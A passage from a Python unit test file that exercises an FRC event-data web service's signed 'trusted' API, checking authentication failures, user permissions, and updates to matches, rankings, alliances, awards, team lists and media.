event_list=[ndb.Key(Event, '2014casj')],
auth_types_enum=[AuthType.EVENT_TEAMS])
self.matches_auth = ApiAuthAccess(id='tEsT_id_1',
secret='321tEsTsEcReT',
description='test',
event_list=[ndb.Key(Event, '2014casj')],
auth_types_enum=[AuthType.EVENT_MATCHES])
self.rankings_auth = ApiAuthAccess(id='tEsT_id_2',
secret='321tEsTsEcReT',
description='test',
event_list=[ndb.Key(Event, '2014casj')],
auth_types_enum=[AuthType.EVENT_RANKINGS])
self.alliances_auth = ApiAuthAccess(id='tEsT_id_3',
secret='321tEsTsEcReT',
description='test',
event_list=[ndb.Key(Event, '2014casj')],
auth_types_enum=[AuthType.EVENT_ALLIANCES])
self.awards_auth = ApiAuthAccess(id='tEsT_id_4',
secret='321tEsTsEcReT',
description='test',
event_list=[ndb.Key(Event, '2014casj')],
auth_types_enum=[AuthType.EVENT_AWARDS])
self.video_auth = ApiAuthAccess(id='tEsT_id_5',
secret='321tEsTsEcReT',
description='test',
event_list=[ndb.Key(Event, '2014casj')],
auth_types_enum=[AuthType.MATCH_VIDEO])
self.expired_auth = ApiAuthAccess(id='tEsT_id_6',
secret='321tEsTsEcReT',
description='test',
event_list=[ndb.Key(Event, '2014casj')],
auth_types_enum=[AuthType.EVENT_MATCHES],
expiration=datetime.datetime(year=1970, month=1, day=1))
self.owned_auth = ApiAuthAccess(id='tEsT_id_7',
secret='321tEsTsEcReT',
description='test',
event_list=[ndb.Key(Event, '2014casj')],
auth_types_enum=[AuthType.EVENT_MATCHES],
owner=ndb.Key(Account, "42"))
self.owned_auth_expired = ApiAuthAccess(id='tEsT_id_8',
secret='321tEsTsEcReT',
description='test',
event_list=[ndb.Key(Event, '2014casj')],
auth_types_enum=[AuthType.EVENT_MATCHES],
owner=ndb.Key(Account, "42"),
expiration=datetime.datetime(year=1970, month=1, day=1))
self.event_info_auth = ApiAuthAccess(id='tEsT_id_9',
secret='321tEsTsEcReT',
description='test',
event_list=[ndb.Key(Event, '2014casj')],
auth_types_enum=[AuthType.EVENT_INFO])
self.event_zebra_motionworks = ApiAuthAccess(id='tEsT_id_10',
secret='321tEsTsEcReT',
description='test',
event_list=[ndb.Key(Event, '2014casj')],
auth_types_enum=[AuthType.ZEBRA_MOTIONWORKS])
self.event = Event(
id='2014casj',
event_type_enum=EventType.REGIONAL,
event_short='casj',
year=2014,
)
self.event.put()
def tearDown(self):
self.testbed.deactivate()
def loginUser(self, is_admin=False):
self.testbed.setup_env(
user_email="foo@bar.com",
user_id="42",
user_is_admin='1' if is_admin else '0',
overwrite=True)
def grantPermission(self, permission):
self.account = Account(id="42", permissions=[permission])
self.account.put()
def test_auth(self):
request_path = '/api/trusted/v1/event/2014casj/matches/update'
request_path_caps_key = '/api/trusted/v1/event/2014CASJ/matches/update'
# Fail
response = self.testapp.post(request_path, expect_errors=True)
self.assertEqual(response.status_code, 400)
self.assertTrue('Error' in response.json)
# Fail
request_body = json.dumps([])
sig = md5.new('{}{}{}'.format('321tEsTsEcReT', request_path, request_body)).hexdigest()
response = self.testapp.post(request_path, request_body, headers={'X-TBA-Auth-Id': 'tEsT_id_1', 'X-TBA-Auth-Sig': sig}, expect_errors=True)
self.assertEqual(response.status_code, 401)
self.assertTrue('Error' in response.json)
self.rankings_auth.put()
self.matches_auth.put()
# Pass
sig = md5.new('{}{}{}'.format('321tEsTsEcReT', request_path, request_body)).hexdigest()
response = self.testapp.post(request_path, request_body, headers={'X-TBA-Auth-Id': 'tEsT_id_1', 'X-TBA-Auth-Sig': sig}, expect_errors=True)
self.assertEqual(response.status_code, 200)
# Pass; all caps key
sig = md5.new('{}{}{}'.format('321tEsTsEcReT', request_path_caps_key, request_body)).hexdigest()
response = self.testapp.post(request_path_caps_key, request_body, headers={'X-TBA-Auth-Id': 'tEsT_id_1', 'X-TBA-Auth-Sig': sig}, expect_errors=True)
self.assertEqual(response.status_code, 200)
# Fail; bad X-TBA-Auth-Id
sig = md5.new('{}{}{}'.format('321tEsTsEcReT', request_path, request_body)).hexdigest()
response = self.testapp.post(request_path, request_body, headers={'X-TBA-Auth-Id': 'badTestAuthId', 'X-TBA-Auth-Sig': sig}, expect_errors=True)
self.assertEqual(response.status_code, 401)
self.assertTrue('Error' in response.json)
# Fail; bad sig
response = self.testapp.post(request_path, request_body, headers={'X-TBA-Auth-Id': 'tEsT_id_1', 'X-TBA-Auth-Sig': '123abc'}, expect_errors=True)
self.assertEqual(response.status_code, 401)
self.assertTrue('Error' in response.json)
# Fail; bad sig due to wrong body
body2 = json.dumps([{}])
sig = md5.new('{}{}{}'.format('321tEsTsEcReT', request_path, request_body)).hexdigest()
response = self.testapp.post(request_path, body2, headers={'X-TBA-Auth-Id': 'tEsT_id_1', 'X-TBA-Auth-Sig': sig}, expect_errors=True)
self.assertEqual(response.status_code, 401)
self.assertTrue('Error' in response.json)
# Fail; bad event
request_path2 = '/api/trusted/v1/event/2014cama/matches/update'
sig = md5.new('{}{}{}'.format('321tEsTsEcReT', request_path2, request_body)).hexdigest()
response = self.testapp.post(request_path, request_body, headers={'X-TBA-Auth-Id': 'tEsT_id_1', 'X-TBA-Auth-Sig': sig}, expect_errors=True)
self.assertEqual(response.status_code, 401)
self.assertTrue('Error' in response.json)
# Fail; insufficient auth_types_enum
sig = md5.new('{}{}{}'.format('321tEsTsEcReT', request_path, request_body)).hexdigest()
response = self.testapp.post(request_path, request_body, headers={'X-TBA-Auth-Id': 'tEsT_id_2', 'X-TBA-Auth-Sig': sig}, expect_errors=True)
self.assertEqual(response.status_code, 401)
self.assertTrue('Error' in response.json)
# Fail; expired keys
sig = md5.new('{}{}{}'.format('321tEsTsEcReT', request_path, request_body)).hexdigest()
response = self.testapp.post(request_path, request_body, headers={'X-TBA-Auth-Id': 'tEsT_id_6', 'X-TBA-Auth-Sig': sig}, expect_errors=True)
self.assertEqual(response.status_code, 401)
self.assertTrue('Error' in response.json)
def test_admin_auth(self):
# Ensure that a logged in admin user can access any evet
request_path = '/api/trusted/v1/event/2014casj/matches/update'
request_body = json.dumps([])
self.loginUser(is_admin=True)
response = self.testapp.post(request_path, request_body, expect_errors=True)
self.assertEqual(response.status_code, 200)
def test_user_auth(self):
# Ensure that a logged in user can use auths granted to their account
request_path = '/api/trusted/v1/event/2014casj/matches/update'
request_body = json.dumps([])
self.owned_auth.put()
self.loginUser()
response = self.testapp.post(request_path, request_body, expect_errors=True)
self.assertEqual(response.status_code, 200)
def test_user_expired_auth(self):
# Ensure that a logged in user can use auths granted to their account
request_path = '/api/trusted/v1/event/2014casj/matches/update'
request_body = json.dumps([])
self.owned_auth_expired.put()
self.loginUser()
# Should end up with a 400 error because the expired key didn't count and no explicit
# Auth-Id header was passed
response = self.testapp.post(request_path, request_body, expect_errors=True)
self.assertEqual(response.status_code, 400)
self.assertTrue('Error' in response.json)
def test_user_permission(self):
self.loginUser()
self.grantPermission(AccountPermissions.OFFSEASON_EVENTWIZARD)
# This should only work for current year offseasons
self.event.year = datetime.datetime.now().year
self.event.event_type_enum = EventType.OFFSEASON
self.event.put()
request_path = '/api/trusted/v1/event/2014casj/matches/update'
request_body = json.dumps([])
response = self.testapp.post(request_path, request_body, expect_errors=True)
self.assertEqual(response.status_code, 200)
def test_user_permission_fail_not_current_year(self):
self.loginUser()
self.grantPermission(AccountPermissions.OFFSEASON_EVENTWIZARD)
# This should only work for current year offseasons
self.event.year = 2012 # Unless this runs in a time machine...
self.event.event_type_enum = EventType.OFFSEASON
self.event.put()
request_path = '/api/trusted/v1/event/2014casj/matches/update'
request_body = json.dumps([])
response = self.testapp.post(request_path, request_body, expect_errors=True)
self.assertEqual(response.status_code, 400)
def test_user_permission_fail_not_offseason_event(self):
self.loginUser()
self.grantPermission(AccountPermissions.OFFSEASON_EVENTWIZARD)
# This should only work for current year offseasons
self.event.year = datetime.datetime.now().year
self.event.event_type_enum = EventType.REGIONAL
self.event.put()
request_path = '/api/trusted/v1/event/2014casj/matches/update'
request_body = json.dumps([])
response = self.testapp.post(request_path, request_body, expect_errors=True)
self.assertEqual(response.status_code, 400)
def test_user_permission_fail_not_granted(self):
self.loginUser()
# This should only work for current year offseasons
self.event.year = datetime.datetime.now().year
self.event.event_type_enum = EventType.OFFSEASON
self.event.put()
request_path = '/api/trusted/v1/event/2014casj/matches/update'
request_body = json.dumps([])
response = self.testapp.post(request_path, request_body, expect_errors=True)
self.assertEqual(response.status_code, 400)
def test_killswitch(self):
request_path = '/api/trusted/v1/event/2014casj/matches/update'
request_body = json.dumps([])
# Pass
self.matches_auth.put()
sig = md5.new('{}{}{}'.format('321tEsTsEcReT', request_path, request_body)).hexdigest()
response = self.testapp.post(request_path, request_body, headers={'X-TBA-Auth-Id': 'tEsT_id_1', 'X-TBA-Auth-Sig': sig}, expect_errors=True)
self.assertEqual(response.status_code, 200)
# Now, set the disable sitevar
trusted_sitevar = Sitevar(
id='trustedapi',
values_json=json.dumps({
3: False,
})
)
trusted_sitevar.put()
# Fail
sig = md5.new('{}{}{}'.format('321tEsTsEcReT', request_path, request_body)).hexdigest()
response = self.testapp.post(request_path, request_body, headers={'X-TBA-Auth-Id': 'tEsT_id_1', 'X-TBA-Auth-Sig': sig}, expect_errors=True)
self.assertEqual(response.status_code, 401)
def test_alliance_selections_update(self):
self.alliances_auth.put()
alliances = [['frc971', 'frc254', 'frc1662'],
['frc1678', 'frc368', 'frc4171'],
['frc2035', 'frc192', 'frc4990'],
['frc1323', 'frc846', 'frc2135'],
['frc2144', 'frc1388', 'frc668'],
['frc1280', 'frc604', 'frc100'],
['frc114', 'frc852', 'frc841'],
['frc2473', 'frc3256', 'frc1868']]
request_body = json.dumps(alliances)
request_path = '/api/trusted/v1/event/2014casj/alliance_selections/update'
sig = md5.new('{}{}{}'.format('321tEsTsEcReT', request_path, request_body)).hexdigest()
response = self.testapp.post(request_path, request_body, headers={'X-TBA-Auth-Id': 'tEsT_id_3', 'X-TBA-Auth-Sig': sig}, expect_errors=True)
self.assertEqual(response.status_code, 200)
self.assertEqual(len(self.event.alliance_selections), 8)
for i, selection in enumerate(self.event.alliance_selections):
self.assertEqual(alliances[i], selection['picks'])
def test_empty_alliance_selections_update(self):
self.alliances_auth.put()
alliances = [['frc971', 'frc254', 'frc1662'],
['frc1678', 'frc368', 'frc4171'],
['frc2035', 'frc192', 'frc4990'],
['frc1323', 'frc846', 'frc2135'],
[], [], [], []]
request_body = json.dumps(alliances)
request_path = '/api/trusted/v1/event/2014casj/alliance_selections/update'
sig = md5.new('{}{}{}'.format('321tEsTsEcReT', request_path, request_body)).hexdigest()
response = self.testapp.post(request_path, request_body, headers={'X-TBA-Auth-Id': 'tEsT_id_3', 'X-TBA-Auth-Sig': sig}, expect_errors=True)
self.assertEqual(response.status_code, 200)
self.assertEqual(len(self.event.alliance_selections), 4)
for i, selection in enumerate(self.event.alliance_selections):
self.assertEqual(alliances[i], selection['picks'])
def test_awards_update(self):
self.awards_auth.put()
awards = [{'name_str': 'Winner', 'team_key': 'frc254'},
{'name_str': 'Winner', 'team_key': 'frc604'},
{'name_str': 'Volunteer Blahblah', 'team_key': 'frc1', 'awardee': 'Bob Bobby'}]
request_body = json.dumps(awards)
request_path = '/api/trusted/v1/event/2014casj/awards/update'
sig = md5.new('{}{}{}'.format('321tEsTsEcReT', request_path, request_body)).hexdigest()
response = self.testapp.post(request_path, request_body, headers={'X-TBA-Auth-Id': 'tEsT_id_4', 'X-TBA-Auth-Sig': sig}, expect_errors=True)
self.assertEqual(response.status_code, 200)
db_awards = Award.query(Award.event == self.event.key).fetch(None)
self.assertEqual(len(db_awards), 2)
self.assertTrue('2014casj_1' in [a.key.id() for a in db_awards])
self.assertTrue('2014casj_5' in [a.key.id() for a in db_awards])
awards = [{'name_str': 'Winner', 'team_key': 'frc254'},
{'name_str': 'Winner', 'team_key': 'frc604'}]
request_body = json.dumps(awards)
sig = md5.new('{}{}{}'.format('321tEsTsEcReT', request_path, request_body)).hexdigest()
response = self.testapp.post(request_path, request_body, headers={'X-TBA-Auth-Id': 'tEsT_id_4', 'X-TBA-Auth-Sig': sig}, expect_errors=True)
self.assertEqual(response.status_code, 200)
db_awards = Award.query(Award.event == self.event.key).fetch(None)
self.assertEqual(len(db_awards), 1)
self.assertTrue('2014casj_1' in [a.key.id() for a in db_awards])
def test_matches_update(self):
self.matches_auth.put()
update_request_path = '/api/trusted/v1/event/2014casj/matches/update'
delete_request_path = '/api/trusted/v1/event/2014casj/matches/delete'
delete_all_request_path = '/api/trusted/v1/event/2014casj/matches/delete_all'
# add one match
matches = [{
'comp_level': 'qm',
'set_number': 1,
'match_number': 1,
'alliances': {
'red': {'teams': ['frc1', 'frc2', 'frc3'],
'score': 25},
'blue': {'teams': ['frc4', 'frc5', 'frc6'],
'score': 26},
},
'time_string': '9:00 AM',
'time_utc': '2014-08-31T16:00:00',
}]
request_body = json.dumps(matches)
sig = md5.new('{}{}{}'.format('321tEsTsEcReT', update_request_path, request_body)).hexdigest()
response = self.testapp.post(update_request_path, request_body, headers={'X-TBA-Auth-Id': 'tEsT_id_1', 'X-TBA-Auth-Sig': sig}, expect_errors=True)
self.assertEqual(response.status_code, 200)
db_matches = Match.query(Match.event == self.event.key).fetch(None)
self.assertEqual(len(db_matches), 1)
self.assertTrue('2014casj_qm1' in [m.key.id() for m in db_matches])
# add another match
matches = [{
'comp_level': 'f',
'set_number': 1,
'match_number': 1,
'alliances': {
'red': {'teams': ['frc1', 'frc2', 'frc3'],
'score': 250},
'blue': {'teams': ['frc4', 'frc5', 'frc6'],
'score': 260},
},
'time_string': '10:00 AM',
'time_utc': '2014-08-31T17:00:00',
}]
request_body = json.dumps(matches)
sig = md5.new('{}{}{}'.format('321tEsTsEcReT', update_request_path, request_body)).hexdigest()
response = self.testapp.post(update_request_path, request_body, headers={'X-TBA-Auth-Id': 'tEsT_id_1', 'X-TBA-Auth-Sig': sig}, expect_errors=True)
self.assertEqual(response.status_code, 200)
db_matches = Match.query(Match.event == self.event.key).fetch(None)
self.assertEqual(len(db_matches), 2)
self.assertTrue('2014casj_qm1' in [m.key.id() for m in db_matches])
self.assertTrue('2014casj_f1m1' in [m.key.id() for m in db_matches])
# add a match and delete a match
matches = [{
'comp_level': 'f',
'set_number': 1,
'match_number': 2,
'alliances': {
'red': {'teams': ['frc1', 'frc2', 'frc3'],
'score': 250,
'surrogates': ['frc1'],
'dqs': ['frc2']},
'blue': {'teams': ['frc4', 'frc5', 'frc6'],
'score': 260,
'surrogates': [],
'dqs': []},
},
'score_breakdown': {
'red': {'auto': 20, 'assist': 40, 'truss+catch': 20, 'teleop_goal+foul': 20},
'blue': {'auto': 40, 'assist': 60, 'truss+catch': 10, 'teleop_goal+foul': 40},
},
'time_string': '11:00 AM',
'time_utc': '2014-08-31T18:00:00',
}]
request_body = json.dumps(matches)
sig = md5.new('{}{}{}'.format('321tEsTsEcReT', update_request_path, request_body)).hexdigest()
response = self.testapp.post(update_request_path, request_body, headers={'X-TBA-Auth-Id': 'tEsT_id_1', 'X-TBA-Auth-Sig': sig}, expect_errors=True)
self.assertEqual(response.status_code, 200)
keys_to_delete = ['qm1']
request_body = json.dumps(keys_to_delete)
sig = md5.new('{}{}{}'.format('321tEsTsEcReT', delete_request_path, request_body)).hexdigest()
response = self.testapp.post(delete_request_path, request_body, headers={'X-TBA-Auth-Id': 'tEsT_id_1', 'X-TBA-Auth-Sig': sig}, expect_errors=True)
self.assertEqual(response.status_code, 200)
self.assertEqual(response.json['keys_deleted'], ['qm1'])
db_matches = Match.query(Match.event == self.event.key).fetch(None)
self.assertEqual(len(db_matches), 2)
self.assertTrue('2014casj_f1m1' in [m.key.id() for m in db_matches])
self.assertTrue('2014casj_f1m2' in [m.key.id() for m in db_matches])
db_matches = Match.query(Match.event == self.event.key).fetch(None)
self.assertEqual(len(db_matches), 2)
self.assertTrue('2014casj_f1m1' in [m.key.id() for m in db_matches])
self.assertTrue('2014casj_f1m2' in [m.key.id() for m in db_matches])
# verify match data
match = Match.get_by_id('2014casj_f1m2')
self.assertEqual(match.time, datetime.datetime(2014, 8, 31, 18, 0))
self.assertEqual(match.time_string, '11:00 AM')
self.assertEqual(match.alliances['red']['teams'], ['frc1', 'frc2', 'frc3'])
self.assertEqual(match.alliances['red']['score'], 250)
self.assertEqual(match.alliances['red']['surrogates'], ['frc1'])
self.assertEqual(match.alliances['red']['dqs'], ['frc1', 'frc2', 'frc3'])
self.assertEqual(match.score_breakdown['red']['truss+catch'], 20)
self.assertEqual(match.alliances['blue']['teams'], ['frc4', 'frc5', 'frc6'])
self.assertEqual(match.alliances['blue']['score'], 260)
self.assertEqual(match.alliances['blue']['surrogates'], [])
self.assertEqual(match.alliances['blue']['dqs'], [])
# test delete all matches
request_body = ''
sig = md5.new('{}{}{}'.format('321tEsTsEcReT', delete_all_request_path, request_body)).hexdigest()
response = self.testapp.post(delete_all_request_path, request_body, headers={'X-TBA-Auth-Id': 'tEsT_id_1', 'X-TBA-Auth-Sig': sig}, expect_errors=True)
self.assertEqual(response.status_code, 400)
request_body = '2014casj'
sig = md5.new('{}{}{}'.format('321tEsTsEcReT', delete_all_request_path, request_body)).hexdigest()
response = self.testapp.post(delete_all_request_path, request_body, headers={'X-TBA-Auth-Id': 'tEsT_id_1', 'X-TBA-Auth-Sig': sig}, expect_errors=True)
self.assertEqual(response.status_code, 200)
db_matches = Match.query(Match.event == self.event.key).fetch(None)
self.assertEqual(len(db_matches), 0)
def test_rankings_update(self):
self.rankings_auth.put()
rankings = {
'breakdowns': ['QS', 'Auton', 'Teleop', 'T&C'],
'rankings': [
{'team_key': 'frc254', 'rank': 1, 'played': 10, 'dqs': 0, 'QS': 20, 'Auton': 500, 'Teleop': 500, 'T&C': 200},
{'team_key': 'frc971', 'rank': 2, 'played': 10, 'dqs': 0, 'QS': 20, 'Auton': 500, 'Teleop': 500, 'T&C': 200}
],
}
request_body = json.dumps(rankings)
request_path = '/api/trusted/v1/event/2014casj/rankings/update'
sig = md5.new('{}{}{}'.format('321tEsTsEcReT', request_path, request_body)).hexdigest()
response = self.testapp.post(request_path, request_body, headers={'X-TBA-Auth-Id': 'tEsT_id_2', 'X-TBA-Auth-Sig': sig}, expect_errors=True)
self.assertEqual(response.status_code, 200)
self.assertEqual(self.event.rankings[0], ['Rank', 'Team', 'QS', 'Auton', 'Teleop', 'T&C', 'DQ', 'Played'])
self.assertEqual(self.event.rankings[1], [1, '254', 20, 500, 500, 200, 0, 10])
def test_rankings_wlt_update(self):
self.rankings_auth.put()
rankings = {
'breakdowns': ['QS', 'Auton', 'Teleop', 'T&C', 'wins', 'losses', 'ties'],
'rankings': [
{'team_key': 'frc254', 'rank': 1, 'wins': 10, 'losses': 0, 'ties': 0, 'played': 10, 'dqs': 0, 'QS': 20, 'Auton': 500, 'Teleop': 500, 'T&C': 200},
{'team_key': 'frc971', 'rank': 2, 'wins': 10, 'losses': 0, 'ties': 0, 'played': 10, 'dqs': 0, 'QS': 20, 'Auton': 500, 'Teleop': 500, 'T&C': 200}
],
}
request_body = json.dumps(rankings)
request_path = '/api/trusted/v1/event/2014casj/rankings/update'
sig = md5.new('{}{}{}'.format('321tEsTsEcReT', request_path, request_body)).hexdigest()
response = self.testapp.post(request_path, request_body, headers={'X-TBA-Auth-Id': 'tEsT_id_2', 'X-TBA-Auth-Sig': sig}, expect_errors=True)
self.assertEqual(response.status_code, 200)
self.assertEqual(self.event.rankings[0], ['Rank', 'Team', 'QS', 'Auton', 'Teleop', 'T&C', 'Record (W-L-T)', 'DQ', 'Played'])
self.assertEqual(self.event.rankings[1], [1, '254', 20, 500, 500, 200, '10-0-0', 0, 10])
def test_eventteams_update(self):
self.teams_auth.put()
team_list = ['frc254', 'frc971', 'frc604']
request_body = json.dumps(team_list)
# Insert teams into db, otherwise they won't get added (see 072058b)
Team(id='frc254', team_number=254).put()
Team(id='frc971', team_number=971).put()
Team(id='frc604', team_number=604).put()
Team(id='frc100', team_number=100).put()
request_path = '/api/trusted/v1/event/2014casj/team_list/update'
sig = md5.new('{}{}{}'.format('321tEsTsEcReT', request_path, request_body)).hexdigest()
response = self.testapp.post(request_path, request_body, headers={'X-TBA-Auth-Id': 'tEsT_id_0', 'X-TBA-Auth-Sig': sig}, expect_errors=True)
self.assertEqual(response.status_code, 200)
db_eventteams = EventTeam.query(EventTeam.event == self.event.key).fetch(None)
self.assertEqual(len(db_eventteams), 3)
self.assertTrue('2014casj_frc254' in [et.key.id() for et in db_eventteams])
self.assertTrue('2014casj_frc971' in [et.key.id() for et in db_eventteams])
self.assertTrue('2014casj_frc604' in [et.key.id() for et in db_eventteams])
team_list = ['frc254', 'frc100']
request_body = json.dumps(team_list)
sig = md5.new('{}{}{}'.format('321tEsTsEcReT', request_path, request_body)).hexdigest()
response = self.testapp.post(request_path, request_body, headers={'X-TBA-Auth-Id': 'tEsT_id_0', 'X-TBA-Auth-Sig': sig}, expect_errors=True)
self.assertEqual(response.status_code, 200)
db_eventteams = EventTeam.query(EventTeam.event == self.event.key).fetch(None)
self.assertEqual(len(db_eventteams), 2)
self.assertTrue('2014casj_frc254' in [et.key.id() for et in db_eventteams])
self.assertTrue('2014casj_frc100' in [et.key.id() for et in db_eventteams])
def test_eventteams_unknown(self):
self.teams_auth.put()
team_list = ['frc254', 'frc971', 'frc604']
request_body = json.dumps(team_list)
# Insert teams into db, otherwise they won't get added (see 072058b)
Team(id='frc254', team_number=254).put()
Team(id='frc971', team_number=971).put()
request_path = '/api/trusted/v1/event/2014casj/team_list/update'
sig = md5.new('{}{}{}'.format('321tEsTsEcReT', request_path, request_body)).hexdigest()
response = self.testapp.post(request_path, request_body, headers={'X-TBA-Auth-Id': 'tEsT_id_0', 'X-TBA-Auth-Sig': sig}, expect_errors=True)
self.assertEqual(response.status_code, 200)
db_eventteams = EventTeam.query(EventTeam.event == self.event.key).fetch(None)
self.assertEqual(len(db_eventteams), 2)
self.assertTrue('2014casj_frc254' in [et.key.id() for et in db_eventteams])
self.assertTrue('2014casj_frc971' in [et.key.id() for et in db_eventteams])
self.assertTrue('2014casj_frc604' not in [et.key.id() for et in db_eventteams])
team_list = ['frc254', 'frc100']
request_body = json.dumps(team_list)
sig = md5.new('{}{}{}'.format('321tEsTsEcReT', request_path, request_body)).hexdigest()
response = self.testapp.post(request_path, request_body, headers={'X-TBA-Auth-Id': 'tEsT_id_0', 'X-TBA-Auth-Sig': sig}, expect_errors=True)
self.assertEqual(response.status_code, 200)
db_eventteams = EventTeam.query(EventTeam.event == self.event.key).fetch(None)
self.assertEqual(len(db_eventteams), 1)
self.assertTrue('2014casj_frc254' in [et.key.id() for et in db_eventteams])
self.assertTrue('2014casj_frc100' not in [et.key.id() for et in db_eventteams])
def test_match_videos_add(self):
self.video_auth.put()
match1 = Match(
id="2014casj_qm1",
alliances_json="""{"blue": {"score": -1, "teams": ["frc3464", "frc20", "frc1073"]}, "red": {"score": -1, "teams": ["frc69", "frc571", "frc176"]}}""",
comp_level="qm",
event=ndb.Key(Event, '2014casj'),
year=2014,
set_number=1,
match_number=1,
team_key_names=[u'frc69', u'frc571', u'frc176', u'frc3464', u'frc20', u'frc1073'],
youtube_videos=["abcdef"]
)
match1.put()
match2 = Match(
id="2014casj_sf1m1",
alliances_json="""{"blue": {"score": -1, "teams": ["frc3464", "frc20", "frc1073"]}, "red": {"score": -1, "teams": ["frc69", "frc571", "frc176"]}}""",
comp_level="sf",
event=ndb.Key(Event, '2014casj'),
year=2014,
set_number=1,
match_number=1,
team_key_names=[u'frc69', u'frc571', u'frc176', u'frc3464', u'frc20', u'frc1073'],
)
match2.put()
match_videos = {'qm1': 'aFZy8iibMD0', 'sf1m1': 'RpSgUrsghv4'}
request_body = json.dumps(match_videos)
request_path = '/api/trusted/v1/event/2014casj/match_videos/add'
sig = md5.new('{}{}{}'.format('321tEsTsEcReT', request_path, request_body)).hexdigest()
response = self.testapp.post(request_path, request_body, headers={'X-TBA-Auth-Id': 'tEsT_id_5', 'X-TBA-Auth-Sig': sig}, expect_errors=True)
self.assertEqual(response.status_code, 200)
self.assertEqual(set(Match.get_by_id('2014casj_qm1').youtube_videos), {'abcdef', 'aFZy8iibMD0'})
self.assertEqual(set(Match.get_by_id('2014casj_sf1m1').youtube_videos), {'RpSgUrsghv4'})
def test_event_media_add(self):
self.video_auth.put()
event = Event(
id='2014casj',
event_type_enum=EventType.REGIONAL,
event_short='casj',
year=2014,
)
event.put()
videos = ['aFZy8iibMD0']
request_body = json.dumps(videos)
request_path = '/api/trusted/v1/event/2014casj/media/add'
sig = md5.new('{}{}{}'.format('321tEsTsEcReT', request_path, request_body)).hexdigest()
response = self.testapp.post(request_path, request_body, headers={'X-TBA-Auth-Id': 'tEsT_id_5', 'X-TBA-Auth-Sig': sig}, expect_errors=True)
self.assertEqual(response.status_code, 200)
media_key = Media.render_key_name(MediaType.YOUTUBE_VIDEO, 'aFZy8iibMD0')
media = Media.get_by_id(media_key)
self.assertIsNotNone(media)
self.assertEqual(media.media_type_enum, MediaType.YOUTUBE_VIDEO)
self.assertEqual(media.foreign_key, 'aFZy8iibMD0')
self.assertIn(ndb.Key(Event, '2014casj'), media.references)
def test_update_event_info(self):
self.event_info_auth.put()
request = {
'first_event_code': 'abc123',
'playoff_type': PlayoffType.ROUND_ROBIN_6_TEAM,
'webcasts': [{'url': 'https://youtu.be/abc123'},
{'type': 'youtube', 'channel': 'cde456'}],
'remap_teams': {
'frc9323': 'frc1323B',
'frc9254': 'frc254B',
'frc8254': 'frc254C',
'frc9000': 'frc6000',
},
'someother': 'randomstuff', # This should be ignored
}
request_body = json.dumps(request)
request_path = '/api/trusted/v1/event/2014casj/info/update'
sig = md5.new('{}{}{}'.format('321tEsTsEcReT', request_path, request_body)).hexdigest()
response = self.testapp.post(request_path, request_body, headers={'X-TBA-Auth-Id': 'tEsT_id_9', 'X-TBA-Auth-Sig': sig})
self.assertEqual(response.status_code, 200)
event = Event.get_by_id('2014casj')
self.assertEqual(event.first_code, 'abc123')
self.assertEqual(event.official, True)
self.assertEqual(event.playoff_type, PlayoffType.ROUND_ROBIN_6_TEAM)
webcasts = event.webcast
self.assertEqual(len(webcasts), 2)
webcast = webcasts[0]
self.assertEqual(webcast['type'], 'youtube')
self.assertEqual(webcast['channel'], 'abc123')
webcast = webcasts[1]
self.assertEqual(webcast['type'], 'youtube')
self.assertEqual(webcast['channel'], 'cde456')
self.assertEqual(event.remap_teams, {
'frc9323': 'frc1323B',
'frc9254': 'frc254B',
'frc8254': 'frc254C',
'frc9000': 'frc6000',
})
# Test invalid remap_teams
request = {
'remap_teams': {
'frc9323': 'frc1323b', # lower case
}
}
request_body = json.dumps(request)
sig = md5.new('{}{}{}'.format('321tEsTsEcReT', request_path, request_body)).hexdigest()
response = self.testapp.post(request_path, request_body, headers={'X-TBA-Auth-Id': 'tEsT_id_9', 'X-TBA-Auth-Sig': sig}, expect_errors=True)
self.assertEqual(response.status_code, 400)
self.assertEqual(event.remap_teams, {
'frc9323': 'frc1323B',
'frc9254': 'frc254B',
'frc8254': 'frc254C',
'frc9000': 'frc6000',
})
request = {
'remap_teams': {
'frc9323': 'frc1323A', # "A" team
}
}
request_body = json.dumps(request)
sig = md5.new('{}{}{}'.format('321tEsTsEcReT', request_path, request_body)).hexdigest()
response = self.testapp.post(request_path, request_body, headers={'X-TBA-Auth-Id': 'tEsT_id_9', 'X-TBA-Auth-Sig': sig}, expect_errors=True)
self.assertEqual(response.status_code, 400)
self.assertEqual(event.remap_teams, {
'frc9323': 'frc1323B',
'frc9254': 'frc254B',
'frc8254': 'frc254C',
'frc9000': 'frc6000',
})
request = {
'remap_teams': {
'frc9323': 'frc1323BB', # Two letters
}
}
request_body = json.dumps(request)
sig = md5.new('{}{}{}'.format('321tEsTsEcReT', request_path, request_body)).hexdigest()
response = self.testapp.post(request_path, request_body, headers={'X-TBA-Auth-Id': 'tEsT_id_9', 'X-TBA-Auth-Sig': sig}, expect_errors=True)
self.assertEqual(response.status_code, 400)
self.assertEqual(event.remap_teams, {
'frc9323': 'frc1323B',
'frc9254': 'frc254B',
'frc8254': 'frc254C',
'frc9000': 'frc6000',
})
request = {
'remap_teams': {
'frc1323B': 'frc1323', # Mapping from B team
}
}
request_body = json.dumps(request)
sig = md5.new('{}{}{}'.format('321tEsTsEcReT', request_path, request_body)).hexdigest()
response = self.testapp.post(request_path, request_body, headers={'X-TBA-Auth-Id': 'tEsT_id_9', 'X-TBA-Auth-Sig': sig}, expect_errors=True)
self.assertEqual(response.status_code, 400)
self.assertEqual(event.remap_teams, {
'frc9323': 'frc1323B',
'frc9254': 'frc254B',
'frc8254': 'frc254C',
'frc9000': 'frc6000',
})
request = {
'remap_teams': {
'1323': 'frc1323B', # Bad starting format
}
}
request_body = json.dumps(request)
sig = md5.new('{}{}{}'.format('321tEsTsEcReT', request_path, request_body)).hexdigest()
response = self.testapp.post(request_path, request_body, headers={'X-TBA-Auth-Id': 'tEsT_id_9', 'X-TBA-Auth-Sig': sig}, expect_errors=True)
self.assertEqual(response.status_code, 400)
self.assertEqual(event.remap_teams, {
'frc9323': 'frc1323B',
'frc9254': 'frc254B',
'frc8254': 'frc254C',
'frc9000': 'frc6000',
})
request = {
'remap_teams': {
'frc1323': '1323B', # Bad ending format
}
}
request_body = json.dumps(request)
sig = md5.new('{}{}{}'.format('321tEsTsEcReT', request_path, request_body)).hexdigest()
response = self.testapp.post(request_path, request_body, headers={'X-TBA-Auth-Id': 'tEsT_id_9', 'X-TBA-Auth-Sig': sig}, expect_errors=True)
self.assertEqual(response.status_code, 400)
self.assertEqual(event.remap_teams, {
'frc9323': 'frc1323B',
'frc9254': 'frc254B',
'frc8254': 'frc254C',
'frc9000': 'frc6000',
})
